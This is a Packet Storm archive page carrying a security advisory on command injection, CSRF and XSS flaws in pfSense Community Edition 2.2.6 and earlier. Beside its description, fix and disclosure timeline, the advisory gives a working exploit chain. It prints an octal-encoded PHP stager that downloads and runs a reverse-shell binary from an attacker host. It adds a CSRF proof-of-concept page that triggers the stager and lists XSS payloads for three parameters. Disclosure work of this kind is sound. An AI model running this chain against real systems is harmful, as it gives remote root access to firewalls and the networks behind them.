exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PfSense Community Edition 2.2.6 CSRF / XSS / Command Injection

PfSense Community Edition 2.2.6 CSRF / XSS / Command Injection
Posted Apr 15, 2016
Authored by Francesco Oddo | Site security-assessment.com

PfSense Community Edition versions 2.2.6 and below suffer from cross site scripting, code injection, and cross site request forgery vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | a1cea41cda47aaf708576b8f7af2aa6b3c4f8bef37be1b6afc196e909188eabc

PfSense Community Edition 2.2.6 CSRF / XSS / Command Injection

Change Mirror Download
(    , )     (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.

presents..

PfSense Community Edition Multiple Vulnerabilities
Affected versions: PfSense Community Edition <= 2.2.6

PDF:
http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf

+-----------+
|Description|
+-----------+
The pfSense community edition firewall is vulnerable to multiple
vulnerabilities, including remote code execution via command injection
as an authenticated non-administrative user, stored and reflected
cross-site scripting.

+------------+
|Exploitation|
+------------+
==Command Injection==
The status_rrd_graph_img.php page is vulnerable to command injection via
the graph GET parameter. A non-administrative authenticated attacker
having access privileges to the graph status functionality can inject
arbitrary operating system commands and execute them in the context of
the root user. Although input validation is performed on the graph
parameter through a regular expression filter, the pipe character is not
removed. Octal characters sequences can be used to encode a payload,
bypass the filter for illegal characters, and create a PHP file to
download and execute a malicious file (i.e. reverse shell) from a remote
attacker controlled host.

[Octal-encoded PHP Stager]
stager = (
'echo \'<?php $shell =
file_get_contents("http://[ATTACKER_IP]/shell.elf");' +
'file_put_contents("myshell.elf", $shell);' +
'system("chmod 755 myshell.elf && ./myshell.elf"); ?> \' > shellexec'
)
encoded_stager = ''
for c in stager:
encoded_stager += "\\\\%03d" %(int(oct(ord(c))))
print encoded_stager

[CSRF POC]
<html>
<head>
<script>
function sploit() {
var query = "database=-throughput.rrd&graph=file|printf
[ENCODED_STAGER]|sh|echo ";
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://<target>/status_rrd_graph_img.php?" +
query, true);
xhr.withCredentials = true;
xhr.send();

setTimeout(shellexec, 2000);
}

function shellexec() {
document.csrf_exploit_exec.submit();
}
</script>
</head>
<body onload="sploit();">
<form name="csrf_exploit_exec"
action="https://<target>/status_rrd_graph_img.php">
<input type="hidden" name="database" value="-throughput.rrd" />
<input type="hidden" name="graph" value="file|php shellexec|echo " />
</form>
</body>
</html>

==Cross-site Scripting==
Multiple instances of stored and reflected cross-scripting
vulnerabilities exist in the web interface of the application. An
authenticated attacker with limited privileges can run arbitrary
JavaScript code in the context of admin users’ session and extend their
access to administrative areas of the application (i.e. command prompt
functionality).

Param => descr
Method => POST
URL => /system_gateways_edit.php
Payload => <script>alert(1)</script>
Render => /system_gateways_groups_edit.php
Type => Stored

Param => container
Method => POST
URL => /firewall_shaper_layer7.php
Payload => "><script>alert(1)</script>
Render => /firewall_shaper_layer7.php
Type => Reflected

Param => newname
Method => POST
URL => /firewall_shaper_vinterface.php
Payload => "><script>alert(1)</script>
Render => /firewall_shaper_vinterface.php
Type => Reflected


+----------+
| Solution |
+----------+
Upgrade to pfSense 2.3. This may be performed in the web interface or
from the console.

+------------+
| Timeline |
+------------+
10/02/2016 – Initial disclosure to pfSense.
11/02/2016 – Vendor confirms receipt of advisory and provides fixes.
16/02/1016 – Sent follow up email about public release.
16/02/2016 – Vendor requests advisory disclosure after release of new
software build.
12/04/2016 – Release of patched software build and vendor disclosure of
security advisories.
15/04/2016 – Public disclosure of security advisory.

+------------+
| Additional |
+------------+
Further information is available in the accompanying PDF.
http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf

+------------+
| References |
+------------+
https://www.pfsense.org/security/advisories/pfSense-SA-16_01.webgui.asc
https://www.pfsense.org/security/advisories/pfSense-SA-16_02.webgui.asc



Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close